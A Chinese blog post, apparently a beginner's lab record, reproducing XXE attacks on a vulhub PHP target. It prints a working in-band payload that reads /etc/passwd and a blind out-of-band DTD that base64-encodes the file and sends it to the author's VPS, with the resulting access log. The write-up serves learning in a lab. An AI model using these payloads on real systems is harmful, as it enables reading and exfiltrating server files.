XXE攻击入门记录

RyoTech
505 阅读2分钟

前置知识

xxe漏洞的学习与利用总结

从几道CTF题学习Blind XXE

XXE无回显(使用vps-payload外带)

一、试一下基本的

靶场环境:BUUOJ:[PHP]XXE

源码github.com/vulhub/vulh…

阅读可知,在libxml 2.8.0版本中,PHP有以下三种解析XML的函数方式:

SimpleXMLElement($data)

$dom = new DOMDocument();
$dom->loadXML($data);

simplexml_load_string($data)

下面分别复现前端有回显和无回显的情况

0x00有回显

本题中$data = file_get_contents('php://input');,且会显示标签name里面的内容。所以post xml

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>


<root>
<name>&xxe;</name>
</root>

0x01无回显

1.VPS的购买

双十二剁手即可

2.nginx(or apache)的搭建

搭博客时弄过了,略

3.用前面的靶场测试一下

先在VPS网页根目录下建立名为1pay.dtd的文件,内容为(其中ip填VPS的公网ip)

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://ip/?p=%file;'>">

VPS上nginx的日志文件在/var/log/nginx/access.log,使用tail命令读取文件尾部并等待刷新:

tail -f /var/log/nginx/access.log

然后post payload

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag[
<!ENTITY % dtd SYSTEM "http://ip/1pay.dtd">
%dtd;
%int;
%send;
]>

得到日志:

117.21.200.166 - - [14/Dec/2021:20:55:05 +0800] "GET /1pay.dtd HTTP/1.0" 200 174 "-" "-" "-"
117.21.200.166 - - [14/Dec/2021:20:55:06 +0800] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovYmluL2ZhbHNlCg== HTTP/1.0" 200 32029 "-" "-" "-"

base64解码即可得到文件内容。

二、触发phar反序列化

待更新

avatar
文章
阅读
粉丝